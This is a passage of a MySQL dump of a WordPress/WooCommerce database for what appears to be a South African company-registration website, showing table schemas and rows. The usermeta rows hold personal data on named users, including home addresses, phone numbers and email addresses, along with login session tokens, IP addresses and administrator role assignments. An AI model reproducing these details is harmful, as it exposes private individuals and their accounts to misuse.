#DTI#','bee-bee-certificate-cipc-dti',0),(38,'#Free# #help# #report#','free-help-report',0),(39,'FAQs','faqs',0),(40,'which company','which-company',0),(41,'type of company','type-of-company',0),(42,'tax clearance','tax-clearance',0),(43,'Trust','trust',0),(44,'customised moi','customised-moi',0),(45,'change rights','change-rights',0),(46,'personal liability','personal-liability',0),(47,'doctor','doctor',0),(48,'lawyer','lawyer',0),(49,'accountant','accountant',0),(50,'professional','professional',0),(51,'common','common',0),(52,'medium business','medium-business',0),(53,'new registration','new-registration',0),(54,'free','free',0),(55,'help','help',0),(56,'report','report',0),(57,'BEE','bee',0),(58,'affidavit','affidavit',0),(59,'exempted','exempted',0),(60,'change','change',0),(61,'appoint','appoint',0),(62,'remove','remove',0),(63,'director','director',0),(64,'cc','cc',0),(65,'closed coporation','closed-coporation',0),(66,'member','member',0),(67,'amend','amend',0),(68,'address','address',0),(69,'closed','closed',0),(70,'import','import',0),(71,'export','export',0),(72,'code','code',0),(73,'vat','vat',0),(74,'value added tax','value-added-tax',0),(75,'sars','sars',0),(76,'tax','tax',0),(77,'urgent','urgent',0),(78,'guarantee','guarantee',0),(79,'clearance','clearance',0),(80,'sars clearance','sars-clearance',0),(81,'tax clearance','tax-clearance',0),(82,'income tax','income-tax',0),(83,'income tax number','income-tax-number',0),(84,'tax number','tax-number',0),(85,'paye','paye',0),(86,'salary tax','salary-tax',0),(87,'uif','uif',0),(88,'sdl','sdl',0),(89,'auditor','auditor',0),(90,'appointment','appointment',0),(91,'resignation','resignation',0),(92,'company','company',0),(93,'secretary','secretary',0),(94,'restoration','restoration',0),(95,'close corporations','close-corporations',0),(96,'company register','company-register',0),(97,'reports','reports',0),(98,'secure','secure',0),(99,'share certificates','share-certificates',0),(100,'shareholders','shareholders',0),(101,'annual','annual',0),(102,'returns','returns',0),(103,'close corporation','close-corporation',0),(104,'exempted','exempted',0),(105,'micro','micro',0),(106,'enterprise','enterprise',0),(107,'eme','eme',0),(108,'micro','micro',0),(109,'enterprise','enterprise',0),(110,'eme','eme',0),(111,'Company Registration','company-registration',0),(112,'Tax Registration','tax-registration',0),(113,'Maintaning your company','maintaning-your-company',0),(114,'BEE','bee',0),(115,'Business Tools','business-tools',0),(116,'company','company',0),(117,'registrations','registrations',0),(118,'FAQs','faqs',0),(119,'Close','close',0),(120,'Coporation','coporation',0),(121,'tax','tax',0),(122,'registration','registration',0),(123,'deregistration','deregistration',0),(124,'companies','companies',0),(125,'close corporations','close-corporations',0),(126,'change','change',0),(127,'financial','financial',0),(128,'year','year',0),(129,'end','end',0),(130,'annual','annual',0),(131,'returns','returns',0),(132,'restoration','restoration',0),(133,'close corporation','close-corporation',0),(134,'reinstatement','reinstatement',0),(135,'my business','my-business',0),(136,'what','what',0),(137,'taxes','taxes',0),(138,'pay tax deadlines','pay-tax-deadlines',0),(139,'coida','coida',0),(140,'deadlines','deadlines',0),(141,'acts','acts',0),(142,'legislation','legislation',0),(143,'wca','wca',0),(144,'workmens','workmens',0),(145,'compensation','compensation',0),(146,'General','general',0),(147,'layout','layout',0),(148,'not_global','not_global',0),(149,'regular','regular',0),(150,'section','section',0),(151,'exclude-from-search','exclude-from-search',0),(152,'exclude-from-catalog','exclude-from-catalog',0),(153,'featured','featured',0),(154,'outofstock','outofstock',0),(155,'rated-1','rated-1',0),(156,'rated-2','rated-2',0),(157,'rated-3','rated-3',0),(158,'rated-4','rated-4',0),(159,'rated-5','rated-5',0),(161,'Income Tax registration','income-tax-registration',0),(162,'Name reservation','name-reservation',0),(163,'BEE Affidavit','bee-affidavit',0),(164,'Share Certificate','share-certificate',0),(165,'Share register','share-register',0),(166,'Vat registration','vat-registration',0),(167,'PAYE registration','paye-registration',0),(169,'row','row',0),(170,'Uncategorised','uncategorised',0),(171,'woocommerce-webhooks','woocommerce-webhooks',0),(172,'3rd party software','3rd-party-software',0),(173,'zoho','zoho',0),(174,'Accounting','accounting',0),(175,'Basic Accounting','basic-accounting',0),(176,'woocommerce-db-updates','woocommerce-db-updates',0),(177,'wc_update_product_lookup_tables','wc_update_product_lookup_tables',0),(178,'wc-admin-notes','wc-admin-notes',0),(179,'wc-admin-data','wc-admin-data',0),(180,'cloud','cloud',0),(181,'Landing','landing',0),(182,'Checkout','checkout',0),(183,'Thank You','thankyou',0),(184,'Upsell','upsell',0),(185,'Downsell','downsell',0),(186,'flow-30037','flow-30037',0),(187,'non-profit','non-profit',0),(188,'company main','company-main',0),(189,'flow-31300','flow-31300',0),(190,'register','register',0),(191,'companyregister','companyregister',0),(192,'Checkout','checkout',0),(193,'offer','offer',0),(194,'module','module',0),(195,'flow-33130','flow-33130',0),(196,'flow-33134','flow-33134',0),(197,'share','share',0),(198,'certificate','certificate',0);
/*!40000 ALTER TABLE `wpxb_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_tm_taskmeta`
--

DROP TABLE IF EXISTS `wpxb_tm_taskmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_tm_taskmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `task_id` bigint(20) NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `task_id` (`task_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_tm_taskmeta`
--

LOCK TABLES `wpxb_tm_taskmeta` WRITE;
/*!40000 ALTER TABLE `wpxb_tm_taskmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_tm_taskmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_tm_tasks`
--

DROP TABLE IF EXISTS `wpxb_tm_tasks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_tm_tasks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `type` varchar(300) COLLATE utf8mb4_unicode_ci NOT NULL,
  `class_identifier` varchar(300) COLLATE utf8mb4_unicode_ci DEFAULT '0',
  `attempts` int(11) DEFAULT 0,
  `description` varchar(300) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `time_created` timestamp NOT NULL DEFAULT current_timestamp(),
  `last_locked_at` bigint(20) DEFAULT 0,
  `status` varchar(300) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_tm_tasks`
--

LOCK TABLES `wpxb_tm_tasks` WRITE;
/*!40000 ALTER TABLE `wpxb_tm_tasks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_tm_tasks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_ufbl_entries`
--

DROP TABLE IF EXISTS `wpxb_ufbl_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_ufbl_entries` (
  `entry_id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `form_id` mediumint(9) DEFAULT NULL,
  `entry_detail` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `entry_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  UNIQUE KEY `entry_id` (`entry_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_ufbl_entries`
--

LOCK TABLES `wpxb_ufbl_entries` WRITE;
/*!40000 ALTER TABLE `wpxb_ufbl_entries` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_ufbl_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_ufbl_forms`
--

DROP TABLE IF EXISTS `wpxb_ufbl_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_ufbl_forms` (
  `form_id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `form_title` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_detail` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_status` int(11) DEFAULT NULL,
  `form_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `form_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  UNIQUE KEY `form_id` (`form_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_ufbl_forms`
--

LOCK TABLES `wpxb_ufbl_forms` WRITE;
/*!40000 ALTER TABLE `wpxb_ufbl_forms` DISABLE KEYS */;
INSERT INTO `wpxb_ufbl_forms` VALUES (1,'Standard Company Registration Form','a:3:{s:10:\"field_data\";a:0:{}s:11:\"form_design\";a:3:{s:12:\"plugin_style\";i:1;s:10:\"form_width\";s:0:\"\";s:13:\"form_template\";s:21:\"ufbl-default-template\";}s:14:\"email_settings\";a:4:{s:14:\"email_reciever\";a:1:{i:0;s:31:\"info@companyregistration.online\";}s:9:\"from_name\";s:0:\"\";s:10:\"from_email\";s:0:\"\";s:12:\"from_subject\";s:0:\"\";}}',1,'2017-06-11 13:53:34','2017-06-11 13:53:34');
/*!40000 ALTER TABLE `wpxb_ufbl_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_updraftcentral_site_temporary_keys`
--

DROP TABLE IF EXISTS `wpxb_updraftcentral_site_temporary_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_updraftcentral_site_temporary_keys` (
  `key_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `key_local_private` blob DEFAULT NULL,
  `key_remote_public` blob DEFAULT NULL,
  `created` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `created` (`created`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_updraftcentral_site_temporary_keys`
--

LOCK TABLES `wpxb_updraftcentral_site_temporary_keys` WRITE;
/*!40000 ALTER TABLE `wpxb_updraftcentral_site_temporary_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_updraftcentral_site_temporary_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_updraftcentral_sitemeta`
--

DROP TABLE IF EXISTS `wpxb_updraftcentral_sitemeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_updraftcentral_sitemeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `site_id` bigint(20) NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `created` bigint(20) DEFAULT 0,
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `site_id` (`site_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_updraftcentral_sitemeta`
--

LOCK TABLES `wpxb_updraftcentral_sitemeta` WRITE;
/*!40000 ALTER TABLE `wpxb_updraftcentral_sitemeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_updraftcentral_sitemeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_updraftcentral_sites`
--

DROP TABLE IF EXISTS `wpxb_updraftcentral_sites`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_updraftcentral_sites` (
  `site_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `url` varchar(300) COLLATE utf8mb4_unicode_ci NOT NULL,
  `admin_url` varchar(300) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `key_local_private` blob DEFAULT NULL,
  `key_remote_public` blob DEFAULT NULL,
  `key_name_indicator` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `sequence_id` bigint(20) DEFAULT 0,
  `remote_user_id` bigint(20) NOT NULL,
  `remote_user_login` varchar(60) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `remote_site_id` bigint(20) DEFAULT 0,
  `connection_method` varchar(30) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `send_cors_headers` tinyint(1) DEFAULT 1,
  PRIMARY KEY (`site_id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_updraftcentral_sites`
--

LOCK TABLES `wpxb_updraftcentral_sites` WRITE;
/*!40000 ALTER TABLE `wpxb_updraftcentral_sites` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_updraftcentral_sites` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_updraftcentral_user_cron`
--

DROP TABLE IF EXISTS `wpxb_updraftcentral_user_cron`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_updraftcentral_user_cron` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `last_run` bigint(20) DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`),
  KEY `last_run` (`last_run`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_updraftcentral_user_cron`
--

LOCK TABLES `wpxb_updraftcentral_user_cron` WRITE;
/*!40000 ALTER TABLE `wpxb_updraftcentral_user_cron` DISABLE KEYS */;
INSERT INTO `wpxb_updraftcentral_user_cron` VALUES (1,3,1537434723);
/*!40000 ALTER TABLE `wpxb_updraftcentral_user_cron` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_usermeta`
--

DROP TABLE IF EXISTS `wpxb_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=1446 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_usermeta`
--

LOCK TABLES `wpxb_usermeta` WRITE;
/*!40000 ALTER TABLE `wpxb_usermeta` DISABLE KEYS */;
INSERT INTO `wpxb_usermeta` VALUES (1,1,'first_name','Imraan'),(2,1,'last_name','Wajoodeen'),(3,1,'nickname','Imraan'),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','midnight'),(8,1,'use_ssl','0'),(9,1,'aim',''),(10,1,'yim',''),(11,1,'jabber',''),(12,1,'wpxb_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(13,1,'wpxb_user_level','10'),(15,1,'wpxb_dashboard_quick_press_last_post_id','33096'),(16,1,'wporg_favorites',''),(17,1,'manageedit-shop_ordercolumnshidden','a:1:{i:0;s:15:\"billing_address\";}'),(18,1,'wpxb_user-settings','libraryContent=browse&hidetb=1&editor=tinymce&wplink=1&advImgDetails=show&editor_plain_text_paste_warning=2&imgsize=full'),(19,1,'wpxb_user-settings-time','1566829807'),(20,1,'wcj_rename_message_hidden','yes'),(21,1,'dismissed_wp_pointers','wr_pb_settings_pointer_contactform_thank_installing,gd-quicksetup-start-wizard,black_studio_tinymce_widget,theme_editor_notice,wp496_privacy'),(22,1,'closedpostboxes_page','a:0:{}'),(23,1,'metaboxhidden_page','a:0:{}'),(24,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(25,1,'metaboxhidden_nav-menus','a:6:{i:0;s:30:\"woocommerce_endpoints_nav_link\";i:1;s:21:\"add-post-type-product\";i:2;s:29:\"add-post-type-wr_cf_post_type\";i:3;s:12:\"add-post_tag\";i:4;s:15:\"add-product_cat\";i:5;s:15:\"add-product_tag\";}'),(26,1,'nav_menu_recently_edited','14'),(27,1,'billing_first_name','Imraan'),(28,1,'billing_last_name','Wajoodeen'),(29,1,'billing_company','Test'),(30,1,'billing_address_1','103 Agapanthus avenue'),(31,1,'billing_address_2','Lenasia'),(32,1,'billing_city','Johannesburg'),(33,1,'billing_postcode','1827'),(34,1,'billing_country','ZA'),(35,1,'billing_state','GP'),(36,1,'billing_phone','0878025219'),(37,1,'billing_email','imraanmaw@gmail.com'),(38,1,'shipping_first_name',''),(39,1,'shipping_last_name',''),(40,1,'shipping_company',''),(41,1,'shipping_address_1',''),(42,1,'shipping_address_2',''),(43,1,'shipping_city',''),(44,1,'shipping_postcode',''),(45,1,'shipping_country',''),(46,1,'shipping_state',''),(47,1,'show_admin_bar_front','true'),(48,2,'nickname','Shop Manager'),(49,2,'first_name','Zainub'),(50,2,'last_name',''),(51,2,'description',''),(52,2,'rich_editing','true'),(53,2,'comment_shortcuts','false'),(54,2,'admin_color','fresh'),(55,2,'use_ssl','0'),(56,2,'show_admin_bar_front','true'),(57,2,'wpxb_capabilities','a:1:{s:12:\"shop_manager\";b:1;}'),(58,2,'wpxb_user_level','9'),(59,2,'dismissed_wp_pointers',''),(62,2,'billing_first_name','Zainub'),(63,2,'billing_last_name','Mahomed'),(64,2,'billing_company',''),(65,2,'billing_address_1','95 Agapanthus Avenue'),(66,2,'billing_address_2',''),(67,2,'billing_city','lenasia'),(68,2,'billing_postcode','1827'),(69,2,'billing_country','ZA'),(70,2,'billing_state','GP'),(71,2,'billing_phone','0820808482'),(72,2,'billing_email','zainubmaw@gmail.com'),(73,2,'shipping_first_name',''),(74,2,'shipping_last_name',''),(75,2,'shipping_company',''),(76,2,'shipping_address_1',''),(77,2,'shipping_address_2',''),(78,2,'shipping_city',''),(79,2,'shipping_postcode',''),(80,2,'shipping_country',''),(81,2,'shipping_state',''),(82,2,'aim',''),(83,2,'yim',''),(84,2,'jabber',''),(88,2,'manageedit-shop_ordercolumnshidden','a:1:{i:0;s:15:\"billing_address\";}'),(89,2,'wpxb_dashboard_quick_press_last_post_id','32285'),(90,2,'wpxb_user-settings','post_dfw=on&editor=tinymce&hidetb=1'),(91,2,'wpxb_user-settings-time','1465980280'),(93,1,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:104:\"woocommerce_dashboard_status,dashboard_right_now,woocommerce_dashboard_recent_reviews,dashboard_activity\";s:4:\"side\";s:57:\"dashboard_quick_press,clef_setup_widget,dashboard_primary\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(94,1,'closedpostboxes_dashboard','a:5:{i:0;s:19:\"dashboard_right_now\";i:1;s:36:\"woocommerce_dashboard_recent_reviews\";i:2;s:18:\"dashboard_activity\";i:3;s:21:\"dashboard_quick_press\";i:4;s:17:\"dashboard_primary\";}'),(95,1,'metaboxhidden_dashboard','a:0:{}'),(111,1,'paying_customer','1'),(116,1,'bewpi-hide-notice','1'),(117,2,'closedpostboxes_post','a:0:{}'),(118,2,'metaboxhidden_post','a:6:{i:0;s:11:\"postexcerpt\";i:1;s:13:\"trackbacksdiv\";i:2;s:10:\"postcustom\";i:3;s:16:\"commentstatusdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(128,2,'paying_customer','1'),(129,2,'_money_spent',''),(130,2,'_order_count','0'),(136,1,'jetpack_tracks_wpcom_id','52707643'),(168,1,'AtD_options',''),(169,1,'AtD_check_when',''),(170,1,'AtD_guess_lang',''),(171,1,'AtD_ignored_phrases',''),(172,1,'last_update','1566653467'),(197,3,'nickname','nazeer'),(198,3,'first_name','Nazeer'),(199,3,'last_name','Abrahams'),(200,3,'description',''),(201,3,'rich_editing','true'),(202,3,'comment_shortcuts','false'),(203,3,'admin_color','fresh'),(204,3,'use_ssl','0'),(205,3,'show_admin_bar_front','true'),(206,3,'locale',''),(207,3,'wpxb_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(208,3,'wpxb_user_level','10'),(209,3,'dismissed_wp_pointers','wp496_privacy,plugin_editor_notice'),(211,3,'session_tokens','a:2:{s:64:\"cf297a15d46cdcb4b3a4645dbbc7d599058513117a14ae65017dfa3980fd73e1\";a:4:{s:10:\"expiration\";i:1567065095;s:2:\"ip\";s:15:\"165.255.168.137\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\";s:5:\"login\";i:1566892295;}s:64:\"1c5d36855136eb0f281193357551d85358f4c4f32477d170a92f29731fedd895\";a:4:{s:10:\"expiration\";i:1567160139;s:2:\"ip\";s:15:\"165.255.168.132\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:5:\"login\";i:1566987339;}}'),(1095,1,'closedpostboxes_cartflows_flow','a:1:{i:0;s:15:\"wcf-upgrade-pro\";}'),(1096,1,'metaboxhidden_cartflows_flow','a:1:{i:0;s:7:\"slugdiv\";}'),(212,3,'manageedit-shop_ordercolumnshidden','a:1:{i:0;s:15:\"billing_address\";}'),(213,3,'wpxb_dashboard_quick_press_last_post_id','33021'),(220,3,'aim',''),(221,3,'yim',''),(222,3,'jabber',''),(223,3,'last_update','1564999097'),(224,3,'billing_first_name','Nazeer'),(225,3,'billing_last_name','Abrahams'),(226,3,'billing_company','Awesome-Inc'),(227,3,'billing_address_1','9 jade close'),(228,3,'billing_address_2','Ext 11'),(229,3,'billing_city','Ennerdale'),(230,3,'billing_state','GP'),(231,3,'billing_postcode','1825'),(232,3,'billing_country','ZA'),(233,3,'billing_email','nazeer3791@gmail.com'),(234,3,'billing_phone','0609834775'),(237,1,'locale',''),(245,1,'cf_pointer_add_element','a:1:{i:0;N;}'),(246,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"102.250.225.0\";}'),(261,3,'paying_customer','1'),(266,3,'community-events-location','a:1:{s:2:\"ip\";s:13:\"165.255.168.0\";}'),(291,3,'wpxb_user-settings','editor=tinymce&hidetb=0&libraryContent=browse&advImgDetails=show&imgsize=full'),(292,3,'wpxb_user-settings-time','1566809459'),(294,1,'wpxb_inpsyde_phchide_BackWP7aa9910f7c6482e1','1'),(296,2,'community-events-location','a:1:{s:2:\"ip\";s:12:\"165.255.71.0\";}'),(318,3,'nav_menu_recently_edited','188'),(319,3,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(320,3,'metaboxhidden_nav-menus','a:9:{i:0;s:21:\"add-post-type-project\";i:1;s:21:\"add-post-type-product\";i:2;s:33:\"add-post-type-fmemailverification\";i:3;s:12:\"add-post_tag\";i:4;s:15:\"add-post_format\";i:5;s:20:\"add-project_category\";i:6;s:15:\"add-project_tag\";i:7;s:15:\"add-product_cat\";i:8;s:15:\"add-product_tag\";}'),(321,1,'caldera_forms_activation_ignore_notice','true'),(322,1,'meta-box-order_product','a:3:{s:4:\"side\";s:105:\"et_settings_meta_box,submitdiv,product_catdiv,tagsdiv-product_tag,postimagediv,woocommerce-product-images\";s:6:\"normal\";s:67:\"postcustom,woocommerce-product-data,slugdiv,postexcerpt,commentsdiv\";s:8:\"advanced\";s:0:\"\";}'),(323,1,'screen_layout_product','2'),(554,1,'syntax_highlighting','true'),(559,3,'syntax_highlighting','true'),(585,2,'session_tokens','a:1:{s:64:\"231b07ebb76cd270d807c5d2ce52668240ac346a395a0583a79d70cd291f1749\";a:4:{s:10:\"expiration\";i:1565188478;s:2:\"ip\";s:14:\"165.255.71.243\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36\";s:5:\"login\";i:1565015678;}}'),(586,2,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(678,3,'shipping_method',''),(687,1,'dismissed_update_notice','1'),(709,1,'shipping_method',''),(719,1,'wc_last_active','1566777600'),(720,2,'wc_last_active','1564963200'),(721,3,'wc_last_active','1566864000'),(736,1,'session_tokens','a:2:{s:64:\"5ff4f0bb12304e7c6a1137c8b537bb735374bd19d47f351589ac87b7f6c03ed7\";a:4:{s:10:\"expiration\";i:1566913023;s:2:\"ip\";s:15:\"102.250.225.121\";s:2:\"ua\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\";s:5:\"login\";i:1566740223;}s:64:\"6a9272c4bb2e98b2571a36652a46d0547d7b3d894c224c34f06ca6b533f0ba4f\";a:4:{s:10:\"expiration\";i:1566997911;s:2:\"ip\";s:15:\"102.250.225.121\";s:2:\"ua\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\";s:5:\"login\";i:1566825111;}}'),(758,1,'_woocommerce_tracks_anon_id','woo:pBjb0kCibC24IXFp37QOW2PO'),(781,3,'wfls-last-captcha-score',''),(783,3,'wfls-last-login','1566987341'),(855,3,'_woocommerce_tracks_anon_id','woo:ppSyJklKU+WF+I7GMyXqN6hH'),(857,1,'wfls-last-captcha-score',''),(859,1,'wfls-last-login','1566825112'),(1296,3,'_order_count','9'),(1297,3,'_money_spent','8123'),(1034,3,'wpxb_media_library_mode','grid'),(1102,1,'closedpostboxes_cartflows_step','a:1:{i:0;s:12:\"et_pb_layout\";}'),(1103,1,'metaboxhidden_cartflows_step','a:1:{i:0;s:7:\"slugdiv\";}'),(1423,1,'_order_count','4'),(1442,1,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"33e75ff09dd601bbe69f351039152189\";a:6:{s:3:\"key\";s:32:\"33e75ff09dd601bbe69f351039152189\";s:10:\"product_id\";i:28;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";}}}'),(1116,3,'closedpostboxes_product','a:1:{i:0;s:14:\"product_catdiv\";}'),(1117,3,'metaboxhidden_product','a:4:{i:0;s:12:\"et_pb_layout\";i:1;s:10:\"postcustom\";i:2;s:7:\"slugdiv\";i:3;s:11:\"commentsdiv\";}'),(1298,3,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1301,2,'wfls-last-login','1565015678'),(1302,2,'_woocommerce_tracks_anon_id','woo:WfAReULNw+kfhdY46p3jzgp/'),(1347,3,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:75:\"dashboard_right_now,dashboard_activity,woocommerce_dashboard_recent_reviews\";s:4:\"side\";s:39:\"dashboard_quick_press,dashboard_primary\";s:7:\"column3\";s:28:\"woocommerce_dashboard_status\";s:7:\"column4\";s:32:\"wordfence_activity_report_widget\";}'),(1424,1,'_money_spent','10');
/*!40000 ALTER TABLE `wpxb_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_users`
--

DROP TABLE IF EXISTS `wpxb_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
